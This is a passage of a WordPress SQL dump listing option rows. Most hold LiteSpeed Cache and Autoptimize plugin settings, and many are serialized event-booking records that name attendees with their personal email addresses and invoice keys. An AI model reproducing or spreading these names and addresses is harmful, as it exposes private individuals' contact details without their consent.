0.1;\"/></svg>','yes'),(6280806,'litespeed.conf.media-lqip','','yes'),(6280807,'litespeed.conf.media-lqip_qual','4','yes'),(6280808,'litespeed.conf.media-lqip_min_w','150','yes'),(6280809,'litespeed.conf.media-lqip_min_h','150','yes'),(6280810,'litespeed.conf.media-placeholder_resp_async','','yes'),(6280811,'litespeed.conf.media-iframe_lazy','','yes'),(6280812,'litespeed.conf.media-add_missing_sizes','','yes'),(6280813,'litespeed.conf.media-lazy_exc','[]','yes'),(6280814,'litespeed.conf.media-lazy_cls_exc','[\"wmu-preview-img\"]','yes'),(6280815,'litespeed.conf.media-lazy_parent_cls_exc','[]','yes'),(6280816,'litespeed.conf.media-iframe_lazy_cls_exc','[]','yes'),(6280817,'litespeed.conf.media-iframe_lazy_parent_cls_exc','[]','yes'),(6280818,'litespeed.conf.media-lazy_uri_exc','[]','yes'),(6280819,'litespeed.conf.media-lqip_exc','[]','yes'),(6280820,'litespeed.conf.img_optm-auto','','yes'),(6280821,'litespeed.conf.img_optm-cron','1','yes'),(6280822,'litespeed.conf.img_optm-ori','1','yes'),(6280823,'litespeed.conf.img_optm-rm_bkup','','yes'),(6280824,'litespeed.conf.img_optm-webp','1','yes'),(6280825,'litespeed.conf.img_optm-lossless','','yes'),(6280826,'litespeed.conf.img_optm-exif','1','yes'),(6280827,'litespeed.conf.img_optm-webp_replace','','yes'),(6280828,'litespeed.conf.img_optm-webp_attr','[\"img.src\",\"div.data-thumb\",\"img.data-src\",\"div.data-large_image\",\"img.retina_logo_url\",\"div.data-parallax-image\",\"video.poster\"]','yes'),(6280829,'litespeed.conf.img_optm-webp_replace_srcset','','yes'),(6280830,'litespeed.conf.img_optm-jpg_quality','82','yes'),(6280831,'litespeed.conf.crawler','','yes'),(6280832,'litespeed.conf.crawler-usleep','500','yes'),(6280833,'litespeed.conf.crawler-run_duration','400','yes'),(6280834,'litespeed.conf.crawler-run_interval','600','yes'),(6280835,'litespeed.conf.crawler-crawl_interval','302400','yes'),(6280836,'litespeed.conf.crawler-threads','3','yes'),(6280837,'litespeed.conf.crawler-timeout','30','yes'),(6280838,'litespeed.conf.crawler-load_limit','1','yes'),(6280839,'litespeed.conf.crawler-sitemap','','yes'),(6280840,'litespeed.conf.crawler-drop_domain','1','yes'),(6280841,'litespeed.conf.crawler-map_timeout','120','yes'),(6280842,'litespeed.conf.crawler-roles','[]','yes'),(6280843,'litespeed.conf.crawler-cookies','[]','yes'),(6280844,'litespeed.conf.misc-heartbeat_front','','yes'),(6280845,'litespeed.conf.misc-heartbeat_front_ttl','60','yes'),(6280846,'litespeed.conf.misc-heartbeat_back','','yes'),(6280847,'litespeed.conf.misc-heartbeat_back_ttl','60','yes'),(6280848,'litespeed.conf.misc-heartbeat_editor','','yes'),(6280849,'litespeed.conf.misc-heartbeat_editor_ttl','15','yes'),(6280850,'litespeed.conf.cdn','','yes'),(6280851,'litespeed.conf.cdn-ori','[]','yes'),(6280852,'litespeed.conf.cdn-ori_dir','[\"wp-content\",\"wp-includes\"]','yes'),(6280853,'litespeed.conf.cdn-exc','[]','yes'),(6280854,'litespeed.conf.cdn-quic','','yes'),(6280855,'litespeed.conf.cdn-cloudflare','','yes'),(6280856,'litespeed.conf.cdn-cloudflare_email','','yes'),(6280857,'litespeed.conf.cdn-cloudflare_key','','yes'),(6280858,'litespeed.conf.cdn-cloudflare_name','','yes'),(6280859,'litespeed.conf.cdn-cloudflare_zone','','yes'),(6280860,'litespeed.conf.cdn-mapping','[{\"url\":\"\",\"inc_img\":\"1\",\"inc_css\":\"1\",\"inc_js\":\"1\",\"filetype\":[\".aac\",\".css\",\".eot\",\".gif\",\".jpeg\",\".jpg\",\".js\",\".less\",\".mp3\",\".mp4\",\".ogg\",\".otf\",\".pdf\",\".png\",\".svg\",\".ttf\",\".webp\",\".woff\",\".woff2\"]}]','yes'),(6280861,'litespeed.conf.cdn-attr','[\".src\",\".data-src\",\".href\",\".poster\",\"source.srcset\"]','yes'),(6280863,'litespeed.gui.lscwp_whm_install','-1','yes'),(6280864,'litespeed.gui.dismiss','-1','yes'),(6280865,'litespeed.gui._summary','{\"new_version\":1655667312,\"score\":1656272112}','yes'),(6280867,'litespeed.data.upgrading','-1','yes'),(6280868,'litespeed.admin_display.messages','[\"<div class=\\\"notice notice-success is-dismissible\\\"><p>Purged all caches successfully.<\\/p><\\/div>\"]','yes'),(6280869,'litespeed.admin_display.msg_pin','-1','yes'),(6280940,'litespeed.crawler.bypass_list','[]','yes'),(6281060,'litespeed.optimize.timestamp_purge_css','1655063490','yes'),(6281086,'litespeed.purge._summary','[]','yes'),(6281204,'autoptimize_version','3.1.10','yes'),(6281205,'autoptimize_ccss_version','AO_3.1.10','yes'),(6281210,'autoptimize_service_availablity','a:2:{s:12:\"extra_imgopt\";a:3:{s:6:\"status\";s:2:\"up\";s:5:\"hosts\";a:1:{i:1;s:28:\"https://sp-ao.shortpixel.ai/\";}s:16:\"launch-threshold\";s:4:\"4096\";}s:7:\"critcss\";a:2:{s:6:\"status\";s:2:\"up\";s:5:\"hosts\";a:1:{i:1;s:24:\"https://criticalcss.com/\";}}}','yes'),(6281218,'autoptimize_imgopt_launched','on','yes'),(6281252,'autoptimize_html','on','yes'),(6281253,'autoptimize_html_keepcomments','','yes'),(6281254,'autoptimize_enable_site_config','on','yes'),(6281255,'autoptimize_js','on','yes'),(6281256,'autoptimize_js_aggregate','on','yes'),(6281257,'autoptimize_js_defer_not_aggregate','','yes'),(6281258,'autoptimize_js_defer_inline','on','yes'),(6281259,'autoptimize_js_exclude',', wp-includes/js/dist/, wp-includes/js/tinymce/, js/jquery/jquery.min.js','yes'),(6281260,'autoptimize_js_trycatch','','yes'),(6281261,'autoptimize_js_justhead','','yes'),(6281262,'autoptimize_js_forcehead','','yes'),(6281263,'autoptimize_js_include_inline','','yes'),(6281264,'autoptimize_css','on','yes'),(6281265,'autoptimize_css_aggregate','on','yes'),(6281266,'autoptimize_css_exclude',', admin-bar.min.css, dashicons.min.css, wp-content/cache/, wp-content/uploads/','yes'),(6281267,'autoptimize_css_justhead','','yes'),(6281268,'autoptimize_css_datauris','','yes'),(6281269,'autoptimize_css_defer','','yes'),(6281270,'autoptimize_css_defer_inline','','yes'),(6281271,'autoptimize_css_inline','','yes'),(6281272,'autoptimize_css_include_inline','on','yes'),(6281273,'autoptimize_cdn_url','','yes'),(6281274,'autoptimize_cache_clean','0','yes'),(6281275,'autoptimize_cache_nogzip','on','yes'),(6281276,'autoptimize_optimize_logged','on','yes'),(6281277,'autoptimize_optimize_checkout','','yes'),(6281278,'autoptimize_minify_excluded','on','yes'),(6281279,'autoptimize_cache_fallback','on','yes'),(6281280,'autoptimize_enable_meta_ao_settings','on','yes'),(6303115,'FYW24835','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655639100:1655643600\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266794;s:11:\"invoice_key\";s:32:\"e4301c70ecd4b98d6897275b51c279c3\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6303143,'JBU21686','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655838000:1655841600\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266795;s:11:\"invoice_key\";s:32:\"41b3cd05982c11c027d266fb2b81df14\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6303175,'GFQ26947','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1658058300:1658062800\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266796;s:11:\"invoice_key\";s:32:\"b8739db3f1740d15c0c561defb156147\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:24:\"hospiceallembe@gmail.com\";s:4:\"name\";s:16:\"Rebazar allembe \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6311043,'OKA60338','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:25:\"marilynmillarhu@gmail.com\";s:4:\"name\";s:14:\"Marilyn Millar\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1655639100:1655643600\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266799;s:11:\"invoice_key\";s:32:\"250c84debb72100a5abc86e65333d932\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:25:\"marilynmillarhu@gmail.com\";s:4:\"name\";s:14:\"Marilyn Millar\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6317197,'autoptimize_extra_settings','a:4:{s:31:\"autoptimize_extra_radio_field_4\";s:1:\"5\";s:34:\"autoptimize_extra_checkbox_field_1\";s:1:\"1\";s:30:\"autoptimize_extra_text_field_2\";s:0:\"\";s:30:\"autoptimize_extra_text_field_7\";s:0:\"\";}','yes'),(6317223,'autoptimize_imgopt_settings','a:4:{s:31:\"autoptimize_imgopt_text_field_6\";s:0:\"\";s:33:\"autoptimize_imgopt_select_field_2\";s:1:\"2\";s:31:\"autoptimize_imgopt_text_field_5\";s:0:\"\";s:33:\"autoptimize_imgopt_number_field_7\";s:1:\"2\";}','yes'),(6322527,'NZS19398','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:4:\"Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1656844200:1656891000\";s:8:\"event_id\";s:6:\"266815\";s:19:\"translated_event_id\";s:6:\"266815\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266817;s:11:\"invoice_key\";s:32:\"00f89d1770dcb7004017bf5aea2c631b\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:4:\"Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6323748,'VZC41276','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:9:\"ELSS Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266822;s:11:\"invoice_key\";s:32:\"29e600b6db7cb7e2dd277e29593cf30d\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"choll.03@comcast.net\";s:4:\"name\";s:9:\"ELSS Test\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6326578,'CFQ67977','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:26:\"laurahbrockyoung@gmail.com\";s:4:\"name\";s:18:\"Laurah Brock young\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266824;s:11:\"invoice_key\";s:32:\"b3a912a8edd1959e427ce72d4acc1098\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:26:\"laurahbrockyoung@gmail.com\";s:4:\"name\";s:18:\"Laurah Brock young\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6342875,'simple_history_total_rows','34979','yes'),(6360553,'GNP44203','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"stoneycole78@gmail.com\";s:4:\"name\";s:11:\"Sarah Cole \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266834;s:11:\"invoice_key\";s:32:\"875f215984dace986b3744e9a7b5e088\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"stoneycole78@gmail.com\";s:4:\"name\";s:11:\"Sarah Cole \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6361210,'MEX17710','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santaigo\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1656844200:1656891000\";s:8:\"event_id\";s:6:\"266815\";s:19:\"translated_event_id\";s:6:\"266815\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266835;s:11:\"invoice_key\";s:32:\"d5e67af76b9e55cebe13edbaf156a8a6\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"Jorge Santaigo\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6361255,'MWK57524','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"jorge santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266836;s:11:\"invoice_key\";s:32:\"267ac4ba441b4378e4dd64e3da555a88\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"jiuuumaluk@gmail.com\";s:4:\"name\";s:14:\"jorge santiago\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6395957,'duplicate_post_version','4.5','yes'),(6406646,'FGB37612','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266846;s:11:\"invoice_key\";s:32:\"2455617d752cef83cc7ac83e0931857a\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:20:\"rmorandi@comcast.net\";s:4:\"name\";s:13:\"Roger Morandi\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6408674,'ETD58832','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1658257200:1658260800\";s:8:\"event_id\";s:6:\"266611\";s:19:\"translated_event_id\";s:6:\"266611\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266847;s:11:\"invoice_key\";s:32:\"3962c7e04502a51975852c5f0af91635\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6408725,'HBU30082','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1658058300:1658062800\";s:8:\"event_id\";s:6:\"266604\";s:19:\"translated_event_id\";s:6:\"266604\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266848;s:11:\"invoice_key\";s:32:\"cb4141b9f339ca95df23722b7f0669b9\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:22:\"lindamaryk@hotmail.com\";s:4:\"name\";s:10:\"Linda Mary\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6421307,'FGM19808','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266851;s:11:\"invoice_key\";s:32:\"961844ed96b44977d78b86005cac35ee\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:19:\"bngstreet@gmail.com\";s:4:\"name\";s:19:\"Bonnie Greenstreet \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6421849,'YVR35929','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:15:\"harusan@aol.com\";s:4:\"name\";s:5:\"Hal H\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266852;s:11:\"invoice_key\";s:32:\"8bed4b91b5bd38d0d91da6f6789ad4cb\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:15:\"harusan@aol.com\";s:4:\"name\";s:5:\"Hal H\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423584,'XDS71085','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:15:\"harusan@aol.com\";s:4:\"name\";s:11:\"Hal Garnett\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets Price\";s:4:\"type\";s:7:\"tickets\";}}s:7:\"payable\";i:0;}s:5:\"total\";i:0;s:8:\"discount\";i:0;s:5:\"price\";i:0;s:6:\"coupon\";N;s:10:\"booking_id\";i:266853;s:11:\"invoice_key\";s:32:\"24f4b89809d84fd7354a5c67212e6adc\";s:7:\"payable\";i:0;s:11:\"old_tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:15:\"harusan@aol.com\";s:4:\"name\";s:11:\"Hal Garnett\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:7:\"gateway\";s:16:\"MEC_gateway_free\";s:11:\"applied_fee\";b:0;s:8:\"order_id\";s:0:\"\";}','no'),(6423623,'UWY19613','a:18:{s:7:\"tickets\";a:1:{i:0;a:4:{s:5:\"email\";s:18:\"dogle007@yahoo.com\";s:4:\"name\";s:13:\"Dave Ogletree\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";}}s:4:\"date\";s:21:\"1657449000:1657495800\";s:8:\"event_id\";s:6:\"266820\";s:19:\"translated_event_id\";s:6:\"266820\";s:9:\"all_dates\";a:0:{}s:11:\"other_dates\";a:0:{}s:13:\"price_details\";a:3:{s:5:\"total\";i:0;s:7:\"details\";a:1:{i:0;a:3:{s:6:\"amount\";i:0;s:11:\"description\";s:13:\"Tickets 